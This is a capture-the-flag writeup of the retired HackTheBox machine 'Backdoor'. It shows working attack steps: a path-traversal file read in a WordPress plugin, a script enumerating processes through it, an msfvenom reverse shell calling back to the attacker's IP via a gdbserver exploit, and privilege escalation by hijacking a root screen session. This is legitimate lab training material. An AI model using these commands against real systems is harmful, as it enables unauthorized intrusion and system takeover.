HTB: Backdoor

Posted on 25 Apr 2022 in security • 2 min read

Backdoor

This is a writeup about a retired HacktheBox machine: Backdoor publish on November 20, 2021 by hkabubaker17. This box is rated as an easy machine. It implies a wordpress plugin, a LFI, a gdbserver and a screen process.

Foothold

Recon

Let us start as always by a nmap scan. Only three TCP ports are open: 22 (SSH), 80 (HTTP) and 1337 (we don't know what is running there).

# Nmap 7.92 scan initiated Tue Jan  4 08:45:39 2022 as: nmap -p- -sSV -oN notes.md 10.129.171.210
Nmap scan report for 10.129.171.210
Host is up (0.013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan  4 08:46:11 2022 -- 1 IP address (1 host up) scanned in 31.95 seconds

The HTTP port is a basic WordPress website.

WordPress homepage

Looking at the installed plugin we found that ebook-download is available:

ebook-download plugin

This WordPress plugin is vulnerable to a LFI that we can exploit to retrieve files on the box.

└─$ curl http://backdoor.htb//wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd../../../../../../../../../etc/passwd../../../../../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
<SNIP>
user:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
<script>window.close()</script>

We want to find which process is running on port 1337. We write a quick python script that get the Max PID and list the process by PID.

import requests

i=0
r = requests.get('http://backdoor.htb//wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/sys/kernel/pid_max')
maxpid= int(r.text[132:-31])
print(maxpid)

while i<maxpid:
    r = requests.get('http://backdoor.htb//wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/'+str(i)+'/cmdline')
    if r.text[102+3*len(str(i)):112+3*len(str(i))]!='<script>wi':
        print(r.text[102+3*len(str(i)):-31])
    i+=1

We finally discover that the 1337 process is a gdbserver. We also notice a sceen session running as root.

└─$ python3 l.py
4194304
/sbin/initautoautomatic-ubiquitynoprompt
<SNIP>
/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
/bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done

gdbserver is vulnerable to a RCE. We generate the reverse shell, start a listener and launch the exploit. Getting a shell as user allowing use to grab the user flag.

└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.26 LPORT=4444 PrependFork=true -o rev.bin

─$ python3 50539 backdoor.htb:1337 rev.bin

└─$ nc -nlvp 4444

listening on [any] 4444 ...
connect to [10.10.14.26] from (UNKNOWN) [10.129.171.210] 42684
id
uid=1000(user) gid=1000(user) groups=1000(user)
cat user.txt
ee34dbf05622446ad1e9f1d35ac6d43e

Root

We create the .ssh directory and put our public SSH key in the authorized_keys file in order to be more comfortable.

Remember that screen process we enumerated before?

/bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done

We can verify that the session is still running:

user@Backdoor:~$ screen -ls root/root
There is a suitable screen on:
        3694.root       (01/05/2022 09:38:33 AM)        (Multi, detached)
1 Socket in /run/screen/S-root.

And we attach it getting the root flag:

user@Backdoor:~$ screen -x root/root

root@Backdoor:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Backdoor:~# cat root.txt
dbb5f80464c7d1489b8bba15d280195e

Wrapping up

A quick an easy box, perfect for me as it has been a while since my last box.